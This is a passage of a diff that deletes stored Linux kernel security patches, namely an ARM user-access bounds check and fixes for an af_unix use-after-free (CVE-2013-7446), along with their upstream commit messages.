-+		: "0" (__p), "r" (__l)					\
-+		: __GUP_CLOBBER_##__s)
- 
- #define get_user(x,p)							\
- 	({								\
-+		unsigned long __limit = current_thread_info()->addr_limit - 1; \
- 		register const typeof(*(p)) __user *__p asm("r0") = (p);\
- 		register unsigned long __r2 asm("r2");			\
-+		register unsigned long __l asm("r1") = __limit;		\
- 		register int __e asm("r0");				\
- 		switch (sizeof(*(__p))) {				\
- 		case 1:							\
--			__get_user_x(__r2, __p, __e, 1, "lr");		\
--	       		break;						\
-+			__get_user_x(__r2, __p, __e, __l, 1);		\
-+			break;						\
- 		case 2:							\
--			__get_user_x(__r2, __p, __e, 2, "r3", "lr");	\
-+			__get_user_x(__r2, __p, __e, __l, 2);		\
- 			break;						\
- 		case 4:							\
--	       		__get_user_x(__r2, __p, __e, 4, "lr");		\
-+			__get_user_x(__r2, __p, __e, __l, 4);		\
- 			break;						\
- 		default: __e = __get_user_bad(); break;			\
- 		}							\
-@@ -135,31 +146,34 @@ extern int __put_user_2(void *, unsigned int);
- extern int __put_user_4(void *, unsigned int);
- extern int __put_user_8(void *, unsigned long long);
- 
--#define __put_user_x(__r2,__p,__e,__s)					\
-+#define __put_user_x(__r2,__p,__e,__l,__s)				\
- 	   __asm__ __volatile__ (					\
- 		__asmeq("%0", "r0") __asmeq("%2", "r2")			\
-+		__asmeq("%3", "r1")					\
- 		"bl	__put_user_" #__s				\
- 		: "=&r" (__e)						\
--		: "0" (__p), "r" (__r2)					\
-+		: "0" (__p), "r" (__r2), "r" (__l)			\
- 		: "ip", "lr", "cc")
- 
- #define put_user(x,p)							\
- 	({								\
-+		unsigned long __limit = current_thread_info()->addr_limit - 1; \
- 		register const typeof(*(p)) __r2 asm("r2") = (x);	\
- 		register const typeof(*(p)) __user *__p asm("r0") = (p);\
-+		register unsigned long __l asm("r1") = __limit;		\
- 		register int __e asm("r0");				\
- 		switch (sizeof(*(__p))) {				\
- 		case 1:							\
--			__put_user_x(__r2, __p, __e, 1);		\
-+			__put_user_x(__r2, __p, __e, __l, 1);		\
- 			break;						\
- 		case 2:							\
--			__put_user_x(__r2, __p, __e, 2);		\
-+			__put_user_x(__r2, __p, __e, __l, 2);		\
- 			break;						\
- 		case 4:							\
--			__put_user_x(__r2, __p, __e, 4);		\
-+			__put_user_x(__r2, __p, __e, __l, 4);		\
- 			break;						\
- 		case 8:							\
--			__put_user_x(__r2, __p, __e, 8);		\
-+			__put_user_x(__r2, __p, __e, __l, 8);		\
- 			break;						\
- 		default: __e = __put_user_bad(); break;			\
- 		}							\
-diff --git a/arch/arm/lib/getuser.S b/arch/arm/lib/getuser.S
-index 11093a7..9b06bb4 100644
---- a/arch/arm/lib/getuser.S
-+++ b/arch/arm/lib/getuser.S
-@@ -16,8 +16,9 @@
-  * __get_user_X
-  *
-  * Inputs:	r0 contains the address
-+ *		r1 contains the address limit, which must be preserved
-  * Outputs:	r0 is the error code
-- *		r2, r3 contains the zero-extended value
-+ *		r2 contains the zero-extended value
-  *		lr corrupted
-  *
-  * No other registers must be altered.  (see <asm/uaccess.h>
-@@ -27,33 +28,39 @@
-  * Note also that it is intended that __get_user_bad is not global.
-  */
- #include <linux/linkage.h>
-+#include <asm/assembler.h>
- #include <asm/errno.h>
- #include <asm/domain.h>
- 
- ENTRY(__get_user_1)
-+	check_uaccess r0, 1, r1, r2, __get_user_bad
- 1: TUSER(ldrb)	r2, [r0]
- 	mov	r0, #0
- 	mov	pc, lr
- ENDPROC(__get_user_1)
- 
- ENTRY(__get_user_2)
--#ifdef CONFIG_THUMB2_KERNEL
--2: TUSER(ldrb)	r2, [r0]
--3: TUSER(ldrb)	r3, [r0, #1]
-+	check_uaccess r0, 2, r1, r2, __get_user_bad
-+#ifdef CONFIG_CPU_USE_DOMAINS
-+rb	.req	ip
-+2:	ldrbt	r2, [r0], #1
-+3:	ldrbt	rb, [r0], #0
- #else
--2: TUSER(ldrb)	r2, [r0], #1
--3: TUSER(ldrb)	r3, [r0]
-+rb	.req	r0
-+2:	ldrb	r2, [r0]
-+3:	ldrb	rb, [r0, #1]
- #endif
- #ifndef __ARMEB__
--	orr	r2, r2, r3, lsl #8
-+	orr	r2, r2, rb, lsl #8
- #else
--	orr	r2, r3, r2, lsl #8
-+	orr	r2, rb, r2, lsl #8
- #endif
- 	mov	r0, #0
- 	mov	pc, lr
- ENDPROC(__get_user_2)
- 
- ENTRY(__get_user_4)
-+	check_uaccess r0, 4, r1, r2, __get_user_bad
- 4: TUSER(ldr)	r2, [r0]
- 	mov	r0, #0
- 	mov	pc, lr
-diff --git a/arch/arm/lib/putuser.S b/arch/arm/lib/putuser.S
-index 7db2599..3d73dcb9 100644
---- a/arch/arm/lib/putuser.S
-+++ b/arch/arm/lib/putuser.S
-@@ -16,6 +16,7 @@
-  * __put_user_X
-  *
-  * Inputs:	r0 contains the address
-+ *		r1 contains the address limit, which must be preserved
-  *		r2, r3 contains the value
-  * Outputs:	r0 is the error code
-  *		lr corrupted
-@@ -27,16 +28,19 @@
-  * Note also that it is intended that __put_user_bad is not global.
-  */
- #include <linux/linkage.h>
-+#include <asm/assembler.h>
- #include <asm/errno.h>
- #include <asm/domain.h>
- 
- ENTRY(__put_user_1)
-+	check_uaccess r0, 1, r1, ip, __put_user_bad
- 1: TUSER(strb)	r2, [r0]
- 	mov	r0, #0
- 	mov	pc, lr
- ENDPROC(__put_user_1)
- 
- ENTRY(__put_user_2)
-+	check_uaccess r0, 2, r1, ip, __put_user_bad
- 	mov	ip, r2, lsr #8
- #ifdef CONFIG_THUMB2_KERNEL
- #ifndef __ARMEB__
-@@ -60,12 +64,14 @@ ENTRY(__put_user_2)
- ENDPROC(__put_user_2)
- 
- ENTRY(__put_user_4)
-+	check_uaccess r0, 4, r1, ip, __put_user_bad
- 4: TUSER(str)	r2, [r0]
- 	mov	r0, #0
- 	mov	pc, lr
- ENDPROC(__put_user_4)
- 
- ENTRY(__put_user_8)
-+	check_uaccess r0, 8, r1, ip, __put_user_bad
- #ifdef CONFIG_THUMB2_KERNEL
- 5: TUSER(str)	r2, [r0]
- 6: TUSER(str)	r3, [r0, #4]
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0001.patch b/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0001.patch
deleted file mode 100644
index be87c762..00000000
--- a/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0001.patch
+++ /dev/null
@@ -1,320 +0,0 @@
-From 7d267278a9ece963d77eefec61630223fce08c6c Mon Sep 17 00:00:00 2001
-From: Rainer Weikusat <rweikusat@mobileactivedefense.com>
-Date: Fri, 20 Nov 2015 22:07:23 +0000
-Subject: unix: avoid use-after-free in ep_remove_wait_queue
-
-Rainer Weikusat <rweikusat@mobileactivedefense.com> writes:
-An AF_UNIX datagram socket being the client in an n:1 association with
-some server socket is only allowed to send messages to the server if the
-receive queue of this socket contains at most sk_max_ack_backlog
-datagrams. This implies that prospective writers might be forced to go
-to sleep despite none of the message presently enqueued on the server
-receive queue were sent by them. In order to ensure that these will be
-woken up once space becomes again available, the present unix_dgram_poll
-routine does a second sock_poll_wait call with the peer_wait wait queue
-of the server socket as queue argument (unix_dgram_recvmsg does a wake
-up on this queue after a datagram was received). This is inherently
-problematic because the server socket is only guaranteed to remain alive
-for as long as the client still holds a reference to it. In case the
-connection is dissolved via connect or by the dead peer detection logic
-in unix_dgram_sendmsg, the server socket may be freed despite "the
-polling mechanism" (in particular, epoll) still has a pointer to the
-corresponding peer_wait queue. There's no way to forcibly deregister a
-wait queue with epoll.
-
-Based on an idea by Jason Baron, the patch below changes the code such
-that a wait_queue_t belonging to the client socket is enqueued on the
-peer_wait queue of the server whenever the peer receive queue full
-condition is detected by either a sendmsg or a poll. A wake up on the
-peer queue is then relayed to the ordinary wait queue of the client
-socket via wake function. The connection to the peer wait queue is again
-dissolved if either a wake up is about to be relayed or the client
-socket reconnects or a dead peer is detected or the client socket is
-itself closed. This enables removing the second sock_poll_wait from
-unix_dgram_poll, thus avoiding the use-after-free, while still ensuring
-that no blocked writer sleeps forever.
-
-Signed-off-by: Rainer Weikusat <rweikusat@mobileactivedefense.com>
-Fixes: ec0d215f9420 ("af_unix: fix 'poll for write'/connected DGRAM sockets")
-Reviewed-by: Jason Baron <jbaron@akamai.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/unix/af_unix.c | 183 +++++++++++++++++++++++++++++++++++++++++++++++------
- 1 file changed, 164 insertions(+), 19 deletions(-)
-
-(limited to 'net/unix/af_unix.c')
-
-diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
-index 955ec15..4e95bdf 100644
---- a/net/unix/af_unix.c
-+++ b/net/unix/af_unix.c
-@@ -326,6 +326,118 @@ found:
- 	return s;
- }
- 
-+/* Support code for asymmetrically connected dgram sockets
-+ *
-+ * If a datagram socket is connected to a socket not itself connected
-+ * to the first socket (eg, /dev/log), clients may only enqueue more
-+ * messages if the present receive queue of the server socket is not
-+ * "too large". This means there's a second writeability condition
-+ * poll and sendmsg need to test. The dgram recv code will do a wake
-+ * up on the peer_wait wait queue of a socket upon reception of a
-+ * datagram which needs to be propagated to sleeping would-be writers
-+ * since these might not have sent anything so far. This can't be
-+ * accomplished via poll_wait because the lifetime of the server
-+ * socket might be less than that of its clients if these break their
-+ * association with it or if the server socket is closed while clients
-+ * are still connected to it and there's no way to inform "a polling
-+ * implementation" that it should let go of a certain wait queue
-+ *
-+ * In order to propagate a wake up, a wait_queue_t of the client
-+ * socket is enqueued on the peer_wait queue of the server socket
-+ * whose wake function does a wake_up on the ordinary client socket
-+ * wait queue. This connection is established whenever a write (or
-+ * poll for write) hit the flow control condition and broken when the
-+ * association to the server socket is dissolved or after a wake up
-+ * was relayed.
-+ */
-+
-+static int unix_dgram_peer_wake_relay(wait_queue_t *q, unsigned mode, int flags,
-+				      void *key)
-+{
-+	struct unix_sock *u;
-+	wait_queue_head_t *u_sleep;
-+
-+	u = container_of(q, struct unix_sock, peer_wake);
-+
-+	__remove_wait_queue(&unix_sk(u->peer_wake.private)->peer_wait,
-+			    q);
-+	u->peer_wake.private = NULL;
-+
-+	/* relaying can only happen while the wq still exists */
-+	u_sleep = sk_sleep(&u->sk);
-+	if (u_sleep)
-+		wake_up_interruptible_poll(u_sleep, key);
-+
-+	return 0;
-+}
-+
-+static int unix_dgram_peer_wake_connect(struct sock *sk, struct sock *other)
-+{
-+	struct unix_sock *u, *u_other;
-+	int rc;
-+
-+	u = unix_sk(sk);
-+	u_other = unix_sk(other);
-+	rc = 0;
-+	spin_lock(&u_other->peer_wait.lock);
-+
-+	if (!u->peer_wake.private) {
-+		u->peer_wake.private = other;
-+		__add_wait_queue(&u_other->peer_wait, &u->peer_wake);
-+
-+		rc = 1;
-+	}
-+
-+	spin_unlock(&u_other->peer_wait.lock);
-+	return rc;
-+}
-+
-+static void unix_dgram_peer_wake_disconnect(struct sock *sk,
-+					    struct sock *other)
-+{
-+	struct unix_sock *u, *u_other;
-+
-+	u = unix_sk(sk);
-+	u_other = unix_sk(other);
-+	spin_lock(&u_other->peer_wait.lock);
-+
-+	if (u->peer_wake.private == other) {
-+		__remove_wait_queue(&u_other->peer_wait, &u->peer_wake);
-+		u->peer_wake.private = NULL;
-+	}
-+
-+	spin_unlock(&u_other->peer_wait.lock);
-+}
-+
-+static void unix_dgram_peer_wake_disconnect_wakeup(struct sock *sk,
-+						   struct sock *other)
-+{
-+	unix_dgram_peer_wake_disconnect(sk, other);
-+	wake_up_interruptible_poll(sk_sleep(sk),
-+				   POLLOUT |
-+				   POLLWRNORM |
-+				   POLLWRBAND);
-+}
-+
-+/* preconditions:
-+ *	- unix_peer(sk) == other
-+ *	- association is stable
-+ */
-+static int unix_dgram_peer_wake_me(struct sock *sk, struct sock *other)
-+{
-+	int connected;
-+
-+	connected = unix_dgram_peer_wake_connect(sk, other);
-+
-+	if (unix_recvq_full(other))
-+		return 1;
-+
-+	if (connected)
-+		unix_dgram_peer_wake_disconnect(sk, other);
-+
-+	return 0;
-+}
-+
- static int unix_writable(const struct sock *sk)
- {
- 	return sk->sk_state != TCP_LISTEN &&
-@@ -431,6 +543,8 @@ static void unix_release_sock(struct sock *sk, int embrion)
- 			skpair->sk_state_change(skpair);
- 			sk_wake_async(skpair, SOCK_WAKE_WAITD, POLL_HUP);
- 		}
-+
-+		unix_dgram_peer_wake_disconnect(sk, skpair);
- 		sock_put(skpair); /* It may now die */
- 		unix_peer(sk) = NULL;
- 	}
-@@ -666,6 +780,7 @@ static struct sock *unix_create1(struct net *net, struct socket *sock, int kern)
- 	INIT_LIST_HEAD(&u->link);
- 	mutex_init(&u->readlock); /* single task reading lock */
- 	init_waitqueue_head(&u->peer_wait);
-+	init_waitqueue_func_entry(&u->peer_wake, unix_dgram_peer_wake_relay);
- 	unix_insert_socket(unix_sockets_unbound(sk), sk);
- out:
- 	if (sk == NULL)
-@@ -1033,6 +1148,8 @@ restart:
- 	if (unix_peer(sk)) {
- 		struct sock *old_peer = unix_peer(sk);
- 		unix_peer(sk) = other;
-+		unix_dgram_peer_wake_disconnect_wakeup(sk, old_peer);
-+
- 		unix_state_double_unlock(sk, other);
- 
- 		if (other != old_peer)
-@@ -1472,6 +1589,7 @@ static int unix_dgram_sendmsg(struct socket *sock, struct msghdr *msg,
- 	struct scm_cookie scm;
- 	int max_level;
- 	int data_len = 0;
-+	int sk_locked;
- 
- 	wait_for_unix_gc();
- 	err = scm_send(sock, msg, &scm, false);
-@@ -1550,12 +1668,14 @@ restart:
- 		goto out_free;
- 	}
- 
-+	sk_locked = 0;
- 	unix_state_lock(other);
-+restart_locked:
- 	err = -EPERM;
- 	if (!unix_may_send(sk, other))
- 		goto out_unlock;
- 
--	if (sock_flag(other, SOCK_DEAD)) {
-+	if (unlikely(sock_flag(other, SOCK_DEAD))) {
- 		/*
- 		 *	Check with 1003.1g - what should
- 		 *	datagram error
-@@ -1563,10 +1683,14 @@ restart:
- 		unix_state_unlock(other);
- 		sock_put(other);
- 
-+		if (!sk_locked)
-+			unix_state_lock(sk);
-+
- 		err = 0;
--		unix_state_lock(sk);
- 		if (unix_peer(sk) == other) {
- 			unix_peer(sk) = NULL;
-+			unix_dgram_peer_wake_disconnect_wakeup(sk, other);
-+
- 			unix_state_unlock(sk);
- 
- 			unix_dgram_disconnected(sk, other);
-@@ -1592,21 +1716,38 @@ restart:
- 			goto out_unlock;
- 	}
- 
--	if (unix_peer(other) != sk && unix_recvq_full(other)) {
--		if (!timeo) {
--			err = -EAGAIN;
--			goto out_unlock;
-+	if (unlikely(unix_peer(other) != sk && unix_recvq_full(other))) {
-+		if (timeo) {
-+			timeo = unix_wait_for_peer(other, timeo);
-+
-+			err = sock_intr_errno(timeo);
-+			if (signal_pending(current))
-+				goto out_free;
-+
-+			goto restart;
- 		}
- 
--		timeo = unix_wait_for_peer(other, timeo);
-+		if (!sk_locked) {
-+			unix_state_unlock(other);
-+			unix_state_double_lock(sk, other);
-+		}
- 
--		err = sock_intr_errno(timeo);
--		if (signal_pending(current))
--			goto out_free;
-+		if (unix_peer(sk) != other ||
-+		    unix_dgram_peer_wake_me(sk, other)) {
-+			err = -EAGAIN;
-+			sk_locked = 1;
-+			goto out_unlock;
-+		}
- 
--		goto restart;
-+		if (!sk_locked) {
-+			sk_locked = 1;
-+			goto restart_locked;
-+		}
- 	}
- 
-+	if (unlikely(sk_locked))
-+		unix_state_unlock(sk);
-+
- 	if (sock_flag(other, SOCK_RCVTSTAMP))
- 		__net_timestamp(skb);
- 	maybe_add_creds(skb, sock, other);
-@@ -1620,6 +1761,8 @@ restart:
- 	return len;
- 
- out_unlock:
-+	if (sk_locked)
-+		unix_state_unlock(sk);
- 	unix_state_unlock(other);
- out_free:
- 	kfree_skb(skb);
-@@ -2476,14 +2619,16 @@ static unsigned int unix_dgram_poll(struct file *file, struct socket *sock,
- 		return mask;
- 
- 	writable = unix_writable(sk);
--	other = unix_peer_get(sk);
--	if (other) {
--		if (unix_peer(other) != sk) {
--			sock_poll_wait(file, &unix_sk(other)->peer_wait, wait);
--			if (unix_recvq_full(other))
--				writable = 0;
--		}
--		sock_put(other);
-+	if (writable) {
-+		unix_state_lock(sk);
-+
-+		other = unix_peer(sk);
-+		if (other && unix_peer(other) != sk &&
-+		    unix_recvq_full(other) &&
-+		    unix_dgram_peer_wake_me(sk, other))
-+			writable = 0;
-+
-+		unix_state_unlock(sk);
- 	}
- 
- 	if (writable)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0002.patch b/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0002.patch
deleted file mode 100644
index 00f6946b..00000000
--- a/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0002.patch
+++ /dev/null
@@ -1,334 +0,0 @@
-From 8a292b04183e82d59721ab0893e4216010aa3db9 Mon Sep 17 00:00:00 2001
-From: Rainer Weikusat <rweikusat@mobileactivedefense.com>
-Date: Fri, 20 Nov 2015 22:07:23 +0000
-Subject: [PATCH] BACKPORT: unix: avoid use-after-free in ep_remove_wait_queue
-
-Rainer Weikusat <rweikusat@mobileactivedefense.com> writes:
-An AF_UNIX datagram socket being the client in an n:1 association with
-some server socket is only allowed to send messages to the server if the
-receive queue of this socket contains at most sk_max_ack_backlog
-datagrams. This implies that prospective writers might be forced to go
-to sleep despite none of the message presently enqueued on the server
-receive queue were sent by them. In order to ensure that these will be
-woken up once space becomes again available, the present unix_dgram_poll
-routine does a second sock_poll_wait call with the peer_wait wait queue
-of the server socket as queue argument (unix_dgram_recvmsg does a wake
-up on this queue after a datagram was received). This is inherently
-problematic because the server socket is only guaranteed to remain alive
-for as long as the client still holds a reference to it. In case the
-connection is dissolved via connect or by the dead peer detection logic
-in unix_dgram_sendmsg, the server socket may be freed despite "the
-polling mechanism" (in particular, epoll) still has a pointer to the
-corresponding peer_wait queue. There's no way to forcibly deregister a
-wait queue with epoll.
-
-Based on an idea by Jason Baron, the patch below changes the code such
-that a wait_queue_t belonging to the client socket is enqueued on the
-peer_wait queue of the server whenever the peer receive queue full
-condition is detected by either a sendmsg or a poll. A wake up on the
-peer queue is then relayed to the ordinary wait queue of the client
-socket via wake function. The connection to the peer wait queue is again
-dissolved if either a wake up is about to be relayed or the client
-socket reconnects or a dead peer is detected or the client socket is
-itself closed. This enables removing the second sock_poll_wait from
-unix_dgram_poll, thus avoiding the use-after-free, while still ensuring
-that no blocked writer sleeps forever.
-
-Signed-off-by: Rainer Weikusat <rweikusat@mobileactivedefense.com>
-Fixes: ec0d215f9420 ("af_unix: fix 'poll for write'/connected DGRAM sockets")
-Reviewed-by: Jason Baron <jbaron@akamai.com>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-
-Bug: 29119002
-(cherry picked from commit 7d267278a9ece963d77eefec61630223fce08c6c)
-Signed-off-by: Aarthi Thiruvengadam <athiru@google.com>
-
-Change-Id: Ia374ee061195088f8c777940baa75cedbe897f4e
----
- include/net/af_unix.h |   1 +
- net/unix/af_unix.c    | 183 ++++++++++++++++++++++++++++++++++++++++++++------
- 2 files changed, 165 insertions(+), 19 deletions(-)
-
-diff --git a/include/net/af_unix.h b/include/net/af_unix.h
-index dbdfd2b0f3b3d..9120783132e71 100644
---- a/include/net/af_unix.h
-+++ b/include/net/af_unix.h
-@@ -62,6 +62,7 @@ struct unix_sock {
- #define UNIX_GC_CANDIDATE	0
- #define UNIX_GC_MAYBE_CYCLE	1
- 	struct socket_wq	peer_wq;
-+	wait_queue_t		peer_wake;
- };
- #define unix_sk(__sk) ((struct unix_sock *)__sk)
- 
-diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
-index 924108f17b9a6..5e6323792a5e0 100644
---- a/net/unix/af_unix.c
-+++ b/net/unix/af_unix.c
-@@ -314,6 +314,118 @@ static struct sock *unix_find_socket_byinode(struct inode *i)
- 	return s;
- }
- 
-+/* Support code for asymmetrically connected dgram sockets
-+ *
-+ * If a datagram socket is connected to a socket not itself connected
-+ * to the first socket (eg, /dev/log), clients may only enqueue more
-+ * messages if the present receive queue of the server socket is not
-+ * "too large". This means there's a second writeability condition
-+ * poll and sendmsg need to test. The dgram recv code will do a wake
-+ * up on the peer_wait wait queue of a socket upon reception of a
-+ * datagram which needs to be propagated to sleeping would-be writers
-+ * since these might not have sent anything so far. This can't be
-+ * accomplished via poll_wait because the lifetime of the server
-+ * socket might be less than that of its clients if these break their
-+ * association with it or if the server socket is closed while clients
-+ * are still connected to it and there's no way to inform "a polling
-+ * implementation" that it should let go of a certain wait queue
-+ *
-+ * In order to propagate a wake up, a wait_queue_t of the client
-+ * socket is enqueued on the peer_wait queue of the server socket
-+ * whose wake function does a wake_up on the ordinary client socket
-+ * wait queue. This connection is established whenever a write (or
-+ * poll for write) hit the flow control condition and broken when the
-+ * association to the server socket is dissolved or after a wake up
-+ * was relayed.
-+ */
-+
-+static int unix_dgram_peer_wake_relay(wait_queue_t *q, unsigned mode, int flags,
-+				      void *key)
-+{
-+	struct unix_sock *u;
-+	wait_queue_head_t *u_sleep;
-+
-+	u = container_of(q, struct unix_sock, peer_wake);
-+
-+	__remove_wait_queue(&unix_sk(u->peer_wake.private)->peer_wait,
-+			    q);
-+	u->peer_wake.private = NULL;
-+
-+	/* relaying can only happen while the wq still exists */
-+	u_sleep = sk_sleep(&u->sk);
-+	if (u_sleep)
-+		wake_up_interruptible_poll(u_sleep, key);
-+
-+	return 0;
-+}
-+
-+static int unix_dgram_peer_wake_connect(struct sock *sk, struct sock *other)
-+{
-+	struct unix_sock *u, *u_other;
-+	int rc;
-+
-+	u = unix_sk(sk);
-+	u_other = unix_sk(other);
-+	rc = 0;
-+	spin_lock(&u_other->peer_wait.lock);
-+
-+	if (!u->peer_wake.private) {
-+		u->peer_wake.private = other;
-+		__add_wait_queue(&u_other->peer_wait, &u->peer_wake);
-+
-+		rc = 1;
-+	}
-+
-+	spin_unlock(&u_other->peer_wait.lock);
-+	return rc;
-+}
-+
-+static void unix_dgram_peer_wake_disconnect(struct sock *sk,
-+					    struct sock *other)
-+{
-+	struct unix_sock *u, *u_other;
-+
-+	u = unix_sk(sk);
-+	u_other = unix_sk(other);
-+	spin_lock(&u_other->peer_wait.lock);
-+
-+	if (u->peer_wake.private == other) {
-+		__remove_wait_queue(&u_other->peer_wait, &u->peer_wake);
-+		u->peer_wake.private = NULL;
-+	}
-+
-+	spin_unlock(&u_other->peer_wait.lock);
-+}
-+
-+static void unix_dgram_peer_wake_disconnect_wakeup(struct sock *sk,
-+						   struct sock *other)
-+{
-+	unix_dgram_peer_wake_disconnect(sk, other);
-+	wake_up_interruptible_poll(sk_sleep(sk),
-+				   POLLOUT |
-+				   POLLWRNORM |
-+				   POLLWRBAND);
-+}
-+
-+/* preconditions:
-+ *	- unix_peer(sk) == other
-+ *	- association is stable
-+ */
-+static int unix_dgram_peer_wake_me(struct sock *sk, struct sock *other)
-+{
-+	int connected;
-+
-+	connected = unix_dgram_peer_wake_connect(sk, other);
-+
-+	if (unix_recvq_full(other))
-+		return 1;
-+
-+	if (connected)
-+		unix_dgram_peer_wake_disconnect(sk, other);
-+
-+	return 0;
-+}
-+
- static inline int unix_writable(struct sock *sk)
- {
- 	return (atomic_read(&sk->sk_wmem_alloc) << 2) <= sk->sk_sndbuf;
-@@ -418,6 +530,8 @@ static void unix_release_sock(struct sock *sk, int embrion)
- 			skpair->sk_state_change(skpair);
- 			sk_wake_async(skpair, SOCK_WAKE_WAITD, POLL_HUP);
- 		}
-+
-+		unix_dgram_peer_wake_disconnect(sk, skpair);
- 		sock_put(skpair); /* It may now die */
- 		unix_peer(sk) = NULL;
- 	}
-@@ -651,6 +765,7 @@ static struct sock *unix_create1(struct net *net, struct socket *sock)
- 	INIT_LIST_HEAD(&u->link);
- 	mutex_init(&u->readlock); /* single task reading lock */
- 	init_waitqueue_head(&u->peer_wait);
-+	init_waitqueue_func_entry(&u->peer_wake, unix_dgram_peer_wake_relay);
- 	unix_insert_socket(unix_sockets_unbound(sk), sk);
- out:
- 	if (sk == NULL)
-@@ -1020,6 +1135,8 @@ static int unix_dgram_connect(struct socket *sock, struct sockaddr *addr,
- 	if (unix_peer(sk)) {
- 		struct sock *old_peer = unix_peer(sk);
- 		unix_peer(sk) = other;
-+		unix_dgram_peer_wake_disconnect_wakeup(sk, old_peer);
-+
- 		unix_state_double_unlock(sk, other);
- 
- 		if (other != old_peer)
-@@ -1459,6 +1576,7 @@ static int unix_dgram_sendmsg(struct kiocb *kiocb, struct socket *sock,
- 	struct scm_cookie tmp_scm;
- 	int max_level;
- 	int data_len = 0;
-+	int sk_locked;
- 
- 	if (NULL == siocb->scm)
- 		siocb->scm = &tmp_scm;
-@@ -1535,12 +1653,14 @@ static int unix_dgram_sendmsg(struct kiocb *kiocb, struct socket *sock,
- 		goto out_free;
- 	}
- 
-+	sk_locked = 0;
- 	unix_state_lock(other);
-+restart_locked:
- 	err = -EPERM;
- 	if (!unix_may_send(sk, other))
- 		goto out_unlock;
- 
--	if (sock_flag(other, SOCK_DEAD)) {
-+	if (unlikely(sock_flag(other, SOCK_DEAD))) {
- 		/*
- 		 *	Check with 1003.1g - what should
- 		 *	datagram error
-@@ -1548,10 +1668,14 @@ static int unix_dgram_sendmsg(struct kiocb *kiocb, struct socket *sock,
- 		unix_state_unlock(other);
- 		sock_put(other);
- 
-+		if (!sk_locked)
-+			unix_state_lock(sk);
-+
- 		err = 0;
--		unix_state_lock(sk);
- 		if (unix_peer(sk) == other) {
- 			unix_peer(sk) = NULL;
-+			unix_dgram_peer_wake_disconnect_wakeup(sk, other);
-+
- 			unix_state_unlock(sk);
- 
- 			unix_dgram_disconnected(sk, other);
-@@ -1577,21 +1701,38 @@ static int unix_dgram_sendmsg(struct kiocb *kiocb, struct socket *sock,
- 			goto out_unlock;
- 	}
- 
--	if (unix_peer(other) != sk && unix_recvq_full(other)) {
--		if (!timeo) {
--			err = -EAGAIN;
--			goto out_unlock;
-+	if (unlikely(unix_peer(other) != sk && unix_recvq_full(other))) {
-+		if (timeo) {
-+			timeo = unix_wait_for_peer(other, timeo);
-+
-+			err = sock_intr_errno(timeo);
-+			if (signal_pending(current))
-+				goto out_free;
-+
-+			goto restart;
- 		}
- 
--		timeo = unix_wait_for_peer(other, timeo);
-+		if (!sk_locked) {
-+			unix_state_unlock(other);
-+			unix_state_double_lock(sk, other);
-+		}
- 
--		err = sock_intr_errno(timeo);
--		if (signal_pending(current))
--			goto out_free;
-+		if (unix_peer(sk) != other ||
-+		    unix_dgram_peer_wake_me(sk, other)) {
-+			err = -EAGAIN;
-+			sk_locked = 1;
-+			goto out_unlock;
-+		}
- 
--		goto restart;
-+		if (!sk_locked) {
-+			sk_locked = 1;
-+			goto restart_locked;
-+		}
- 	}
- 
-+	if (unlikely(sk_locked))
-+		unix_state_unlock(sk);
-+
- 	if (sock_flag(other, SOCK_RCVTSTAMP))
- 		__net_timestamp(skb);
- 	maybe_add_creds(skb, sock, other);
-@@ -1605,6 +1746,8 @@ static int unix_dgram_sendmsg(struct kiocb *kiocb, struct socket *sock,
- 	return len;
- 
- out_unlock:
-+	if (sk_locked)
-+		unix_state_unlock(sk);
- 	unix_state_unlock(other);
- out_free:
- 	kfree_skb(skb);
-@@ -2243,14 +2386,16 @@ static unsigned int unix_dgram_poll(struct file *file, struct socket *sock,
- 		return mask;
- 
- 	writable = unix_writable(sk);
--	other = unix_peer_get(sk);
--	if (other) {
--		if (unix_peer(other) != sk) {
--			sock_poll_wait(file, &unix_sk(other)->peer_wait, wait);
--			if (unix_recvq_full(other))
--				writable = 0;
--		}
--		sock_put(other);
-+	if (writable) {
-+		unix_state_lock(sk);
-+
-+		other = unix_peer(sk);
-+		if (other && unix_peer(other) != sk &&
-+		    unix_recvq_full(other) &&
-+		    unix_dgram_peer_wake_me(sk, other))
-+			writable = 0;
-+
-+		unix_state_unlock(sk);
- 	}
- 
- 	if (writable)
diff --git a/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0003.patch b/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0003.patch
deleted file mode 100644
index 65238ba8..00000000
--- a/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0003.patch
+++ /dev/null
@@ -1,56 +0,0 @@
-From 5bed19c9f463f9078063363779548c50aea271a0 Mon Sep 17 00:00:00 2001
-From: Rainer Weikusat <rweikusat@mobileactivedefense.com>
-Date: Thu, 11 Feb 2016 19:37:27 +0000
-Subject: [PATCH] UPSTREAM: af_unix: Guard against other == sk in
- unix_dgram_sendmsg
-
-(cherry picked from commit a5527dda344fff0514b7989ef7a755729769daa1)
-
-The unix_dgram_sendmsg routine use the following test
-
-if (unlikely(unix_peer(other) != sk && unix_recvq_full(other))) {
-
-to determine if sk and other are in an n:1 association (either
-established via connect or by using sendto to send messages to an
-unrelated socket identified by address). This isn't correct as the
-specified address could have been bound to the sending socket itself or
-because this socket could have been connected to itself by the time of
-the unix_peer_get but disconnected before the unix_state_lock(other). In
-both cases, the if-block would be entered despite other == sk which
-might either block the sender unintentionally or lead to trying to unlock
-the same spin lock twice for a non-blocking send. Add a other != sk
-check to guard against this.
-
-Fixes: 7d267278a9ec ("unix: avoid use-after-free in ep_remove_wait_queue")
-Reported-By: Philipp Hahn <pmhahn@pmhahn.de>
-Signed-off-by: Rainer Weikusat <rweikusat@mobileactivedefense.com>
-Tested-by: Philipp Hahn <pmhahn@pmhahn.de>
-Signed-off-by: David S. Miller <davem@davemloft.net>
-
-Fixes: Change-Id: Ia374ee061195088f8c777940baa75cedbe897f4e
-       ("UPSTREAM: unix: avoid use-after-free in ep_remove_wait_queue")
